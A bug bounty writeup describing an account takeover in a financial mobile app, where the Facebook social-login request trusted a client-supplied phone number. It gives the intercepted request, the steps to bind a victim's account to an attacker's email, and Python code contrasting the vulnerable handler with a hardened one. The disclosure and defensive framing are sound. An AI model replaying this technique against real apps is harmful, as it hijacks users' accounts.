Story of an Account Takeover: Using Social Login with a Mass Assignment Vulnerability to hack accounts!

Hey everyone, this is Mohammad Kaif aka mkahmad, an 18-year-old Security Researcher & Bug Hunter from Varanasi, India.

This is my first writeup, about an Account Takeover which I found on a private program.

So let’s start 😉

Let’s call the program REDACTED. This program had a mobile app in scope, so I downloaded the app directly from the Play Store and started testing it.

The target app had social login options such as Login with Facebook and Login with Google, so I started checking this functionality.

The app had SSL pinning, so I bypassed it with a Frida script and fired up Burp Suite.

The target app was a financial app in which users could sign up through email or phone number as well as through social login channels, i.e. Facebook and Google.

The signup with Facebook functionality had a Mass Assignment vulnerability through which an attacker could completely take over a victim’s account just by knowing the victim’s phone number.

Mass assignment vulnerabilities occur when a user is able to initialize or overwrite server-side variables that the application never intended to be user-controlled. By manually crafting a request to include additional parameters, a malicious user may adversely affect application functionality.

  1. Click on the Login with Facebook button in the app.
  2. Intercept the request using Burp Suite.
  3. After authorizing the app on Facebook, the app sent the following HTTP request:

POST /signup/users/socialLogin HTTP/1.1
Content-Type: application/json; charset=UTF-8
Content-Length: 834
Host: api.redacted.com
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/4.2.1

{"profile_picture":"http://graph.facebook.com/3061xxxxxxxxx/picture?type=large","emailId":"example@gmail.com","socialType":"FB","fname":"test","pincode":"","dob":"","mobile":"","city":"","gender":"","androidId":"3c91804d96d13669","deviceToken":"xxxx","appVersion":"1.0.0|10","country":"","socialId":"306199919","addressl2":"","lname":"Test"}

The mobile parameter in the above HTTP request was vulnerable to Mass Assignment: the server trusted whatever phone number the client sent and used it to pick the account that the new social identity gets linked to.

4. Enter the victim’s account phone number as the value of the mobile parameter and forward the request.

5. Now the victim’s account is attached to the attacker’s email 😎

6. What makes it a more severe attack? Users can’t update or delete the email on their account!

7. Reported and Rewarded by the company ;)
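To show the root cause and the fix side by side, here is an added example (my own model, not the program’s actual backend code) of the /signup/users/socialLogin handler in its mass-assignment-prone form and in a hardened form. The in-memory user store, the phone number and the attacker values are constructed; the field names follow the captured request.

```python
# Added example (not the program's real backend): a minimal model of the
# /signup/users/socialLogin handler, mass-assignment-prone and then hardened.
# The user store, the phone number and the attacker values are constructed.

# Fields the client may legitimately set on its own profile. Identity fields
# (emailId, socialId, socialType) and the account key (mobile) are deliberately
# absent: those must come from the provider token or a separately verified flow.
ALLOWED_FIELDS = {"fname", "lname", "profile_picture", "city", "gender", "dob"}

def social_login_vulnerable(users, body):
    """Binds every JSON key straight into the record selected by the
    client-supplied mobile number, exactly the pattern the writeup abuses."""
    mobile = body.get("mobile") or f"social:{body['socialId']}"  # empty -> social-only account
    user = users.setdefault(mobile, {"mobile": mobile})
    user.update(body)  # BUG: attacker-chosen emailId/socialId overwrite the victim's record
    return user

def social_login_hardened(users, body, provider_profile):
    """Keys the account on the identity the provider's token vouches for, copies
    only allow-listed cosmetic fields, and never links a phone number taken from
    the request body (that belongs in its own OTP-verified step)."""
    key = f"{provider_profile['socialType']}:{provider_profile['socialId']}"
    user = users.setdefault(key, {
        "socialType": provider_profile["socialType"],
        "socialId": provider_profile["socialId"],
        "emailId": provider_profile["email"],  # from the verified token, not the body
        "mobile": "",                          # linked later, after OTP verification
    })
    for field in ALLOWED_FIELDS.intersection(body):
        user[field] = body[field]
    return user

def run_scenario(hardened):
    """Replays the writeup: the victim owns a phone-number account, the attacker
    logs in with Facebook and puts the victim's number in `mobile`.
    Returns the email attached to the victim's record afterwards."""
    victim_mobile = "+919999000011"  # constructed
    users = {victim_mobile: {"mobile": victim_mobile, "emailId": "victim@example.com"}}
    attacker_body = {  # mirrors the shape of the captured request
        "profile_picture": "http://graph.facebook.com/ATTACKER_ID/picture?type=large",
        "emailId": "attacker@example.com", "socialType": "FB", "fname": "test",
        "lname": "Test", "mobile": victim_mobile, "socialId": "ATTACKER_ID",
    }
    if hardened:
        provider_profile = {"socialType": "FB", "socialId": "ATTACKER_ID",
                            "email": "attacker@example.com"}  # what the FB token asserts
        social_login_hardened(users, attacker_body, provider_profile)
    else:
        social_login_vulnerable(users, attacker_body)
    return users[victim_mobile]["emailId"]
```

With the vulnerable handler the victim’s record ends up carrying the attacker’s email; with the hardened handler the attacker only gets a fresh account keyed on their own Facebook identity and the victim’s record is untouched.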

Response from the company:

We are very grateful for your submission. Thank you for your excellent work.

Connect with me on my LinkedIn and Twitter

LinkedIn: https://www.linkedin.com/in/mohammad-kaif-security/

Twitter: https://twitter.com/_mkahmad

Thank you for reading my writeup. I will publish more writeups in the future ;)

Hope you guys learned something from this article.

I am a Security Researcher and Bug Hunter. Passionate about Web & Mobile Security Vulnerabilities